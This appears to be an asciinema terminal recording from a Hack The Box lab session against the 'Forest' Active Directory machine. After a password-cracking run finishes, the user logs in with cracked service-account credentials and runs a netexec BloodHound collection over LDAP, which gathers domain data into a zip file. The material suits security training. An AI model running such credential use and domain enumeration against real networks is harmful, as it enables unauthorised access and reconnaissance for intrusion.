[0.000079, "o", "\r\nUse the \"--show\" option to display all of the cracked passwords reliably\r\nSession completed. \r\n"]
[0.020672, "o", "\u001b[?2004h\u001b[1;32m┌─[\u001b[1;34msg-dedivip-1\u001b[1;32m]─[\u001b[1;37m10.10.14.107\u001b[1;32m]─[\u001b[1;37mlambermaybe\u001b[01;32m@\u001b[01;34mhtb-fiabh8rq5n\u001b[1;32m]─[\u001b[1;37m~\u001b[1;32m]\r\r\n\u001b[1;32m└──╼ [\u001b[01;33m★\u001b[01;32m]$ \u001b[0m\u001b[1;32m\u001b[K"]
[2.878892, "o", "n"]
[0.121626, "o", "e"]
[0.220929, "o", "t"]
[0.226545, "o", "e"]
[0.254735, "o", "x"]
[0.265092, "o", "e"]
[0.238898, "o", "c"]
[0.156556, "o", " "]
[1.726404, "o", "l"]
[0.065634, "o", "d"]
[0.121956, "o", "a"]
[0.118774, "o", "p"]
[0.160207, "o", " "]
[0.582382, "o", "1"]
[0.155999, "o", "0"]
[0.181433, "o", "."]
[0.158106, "o", "1"]
[0.770838, "o", "2"]
[0.255399, "o", "9"]
[0.301042, "o", "."]
[0.117789, "o", "2"]
[0.241996, "o", "4"]
[0.163446, "o", "."]
[0.127582, "o", "1"]
[0.2567, "o", "9"]
[0.035441, "o", "0"]
[0.40038, "o", " "]
[0.602732, "o", "-"]
[0.373486, "o", "u"]
[0.126671, "o", " "]
[0.323355, "o", "'"]
[7.387875, "o", "\u001b[7msvc-alfresco\u001b[27m"]
[0.705262, "o", "\b\b\b\b\b\b\b\b\b\b\b\bsvc-alfresco'"]
[0.154802, "o", " "]
[2.017103, "o", "-"]
[0.248427, "o", "p"]
[0.147432, "o", " "]
[0.309602, "o", "'"]
[2.665291, "o", "\u001b[7ms3rvice\u001b[27m"]
[0.913241, "o", "\b\b\b\b\b\b\bs3rvice'"]
[0.061098, "o", " "]
[2.234139, "o", "-"]
[0.131864, "o", "-"]
[0.400429, "o", "b"]
[0.321573, "o", "l"]
[0.928315, "o", "o"]
[0.150415, "o", "o"]
[0.282984, "o", "d"]
[0.984506, "o", "h"]
[0.15727, "o", "o"]
[0.092139, "o", "u"]
[0.278904, "o", "n"]
[0.213825, "o", "d"]
[0.325474, "o", " "]
[1.761907, "o", "-"]
[0.029704, "o", "c"]
[0.112125, "o", " "]
[0.45029, "o", "A"]
[0.331267, "o", "l"]
[0.143901, "o", "l"]
[0.10845, "o", " "]
[1.098711, "o", "-"]
[0.109173, "o", "-"]
[0.144031, "o", "d"]
[0.15872, "o", "n"]
[0.151769, "o", "s"]
[0.249423, "o", "-"]
[0.593479, "o", "s"]
[0.254994, "o", "e"]
[0.060647, "o", "r"]
[0.118833, "o", "v"]
[0.076204, "o", "e"]
[0.082053, "o", "r"]
[2.258931, "o", " "]
[0.246959, "o", "1"]
[0.315612, "o", "0"]
[0.074, "o", "."]
[0.143263, "o", "1"]
[0.23759, "o", "2"]
[0.232572, "o", "9"]
[0.63323, "o", "."]
[0.431829, "o", "2"]
[0.504312, "o", "4"]
[0.134775, "o", "."]
[0.209877, "o", "1"]
[0.17017, "o", "9"]
[0.023357, "o", "0"]
[3.841465, "o", "\r\n\u001b[?2004l\r"]
[0.021112, "o", "\u001b[0m"]
[0.522517, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;34m[*]\u001b[0m Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (\u001b[1;32msigning:True\u001b[0m) (\u001b[1;33mSMBv1:True\u001b[0m)\r\n"]
[0.020114, "o", "\u001b[1;34mLDAP\u001b[0m        10.129.24.190   389    FOREST           \u001b[1;32m[+]\u001b[0m htb.local\\svc-alfresco:s3rvice \r\n"]
[0.000345, "o", "\u001b[1;34mLDAP\u001b[0m        10.129.24.190   389    FOREST           \u001b[1;33mResolved collection methods: localadmin, session, dcom, container, trusts, rdp, acl, group, psremote, objectprops\u001b[0m\r\n"]
[4.570248, "o", "\u001b[1;34mLDAP\u001b[0m        10.129.24.190   389    FOREST           \u001b[1;33mDone in 00M 04S\u001b[0m\r\n"]
[0.000475, "o", "\u001b[1;34mLDAP\u001b[0m        10.129.24.190   389    FOREST           \u001b[1;33mCompressing output into /home/lambermaybe/.nxc/logs/FOREST_10.129.24.190_2025-10-16_190103_bloodhound.zip\u001b[0m\r\n"]
[0.177423, "o", "\u001b[?2004h\u001b[1;32m┌─[\u001b[1;34msg-dedivip-1\u001b[1;32m]─[\u001b[1;37m10.10.14.107\u001b[1;32m]─[\u001b[1;37mlambermaybe\u001b[01;32m@\u001b[01;34mhtb-fiabh8rq5n\u001b[1;32m]─[\u001b[1;37m~\u001b[1;32m]\r\r\n\u001b[1;32m└──╼ [\u001b[01;33m★\u001b[01;32m]$ \u001b[0m\u001b[1;32m\u001b[K"]
[2.86765, "o", "e"]
[0.147531, "o", "x"]
[0.20014, "o", "i"]
[0.166506, "o", "t"]
[0.509175, "o", "\r\n\u001b[?2004l\r"]
[0.011152, "o", "\u001b[0m"]
[0.000219, "o", "exit\r\n"]
[0.000783, "x", "0"]
